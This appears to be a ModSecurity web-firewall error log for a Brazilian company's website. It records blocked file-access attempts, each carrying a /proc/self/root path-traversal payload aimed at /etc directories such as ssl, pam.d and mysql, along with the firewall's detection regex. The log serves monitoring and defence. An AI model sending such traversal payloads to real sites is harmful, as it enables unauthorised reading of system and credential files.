[Mon Mar 16 16:46:23.932377 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:46618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheD7ysWC90G-1nBrBXjwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:24.350884 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.228.16:37972] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abheEI6lpbStxTqkSkt-LgAAAlc"]
[Mon Mar 16 16:46:25.122768 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:46626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheEY6lpbStxTqkSkt-LwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:26.432920 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.243.203:46628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheElajLEzk2WiQ-10m2wAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:27.585494 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:46636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheE6TCbgAP5jq5TehAYAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:30.061178 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:46650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheFv9ocpUE4ed4uDwGZAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:31.352870 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:51376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheF_9ocpUE4ed4uDwGZwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:32.643779 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.243.203:51390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheGM_BxrYCr4hPDw_-CQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:33.981028 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:51404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheGaQpVkWug9HeOt9JCwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:36.507783 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:51420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheG6QpVkWug9HeOt9JDQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:38.951134 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:51426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheHv9ocpUE4ed4uDwGbgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:40.274952 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:43634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheILysWC90G-1nBrBXlgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:46.375732 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:43636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheJY6lpbStxTqkSkt-OQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:47.820768 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:43648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheJ7ABkC4fWIHEf8EG5wAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:49.007598 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:43664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheKbysWC90G-1nBrBXmAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:49.796238 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:43108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheKaTCbgAP5jq5TehAdAAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:51.089427 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:51334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheK9SswJuvopo3lOhy3QAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:51.650118 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.243.203:47486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheK0r9dMAiw-8KANNaugAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:52.299439 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:51340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheLKQpVkWug9HeOt9JEwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:52.979035 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:47502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheLFajLEzk2WiQ-10m4AAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:53.535436 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:51356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheLc_BxrYCr4hPDw_-EAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:54.160683 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:47504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheLv9ocpUE4ed4uDwGcQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
